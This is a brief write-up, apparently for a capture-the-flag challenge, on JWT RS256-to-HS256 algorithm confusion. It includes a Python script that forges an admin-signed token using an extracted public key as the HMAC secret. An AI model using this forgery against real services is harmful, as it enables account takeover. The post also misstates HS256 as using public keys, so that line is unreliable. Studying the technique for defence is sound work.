JWT Confusion
Refer
Portswigger Document
JWT vulnerability🩸
Info
This Problem is JWT confusion.
RS256 uses an asymmetric key, a private key for generation, and a public key for verification.
HS256 uses public keys for both token creation and verification. By using the difference between the two, authentication can be bypassed by extracting the public key of RS256 and creating a token with HS256 when verifying both methods.
Key extract : https://github.com/silentsignal/rsa_sign2n/tree/release/standalone
Exploit
After Extract key, you can sign JWT as You Want.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import json
import base64
import hashlib
import hmac
key = open("./key.pem").read() # Extracted Key
headDict = {"alg": "HS256","typ": "JWT"}
paylDict = {
"username": "admin",
"iat": 1720866236,
"exp": 1720953073
}
newContents = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")+"."+base64.urlsafe_b64encode(json.dumps(paylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=")
newContents = newContents.encode().decode('UTF-8')
newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=")
print(newContents+"."+newSig)
Key Example ( Don’t forget EOL )
1
2
3
4
-----BEGIN PUBLIC KEY-----
(...)
-----END PUBLIC KEY-----
This post is licensed under CC BY 4.0 by the author.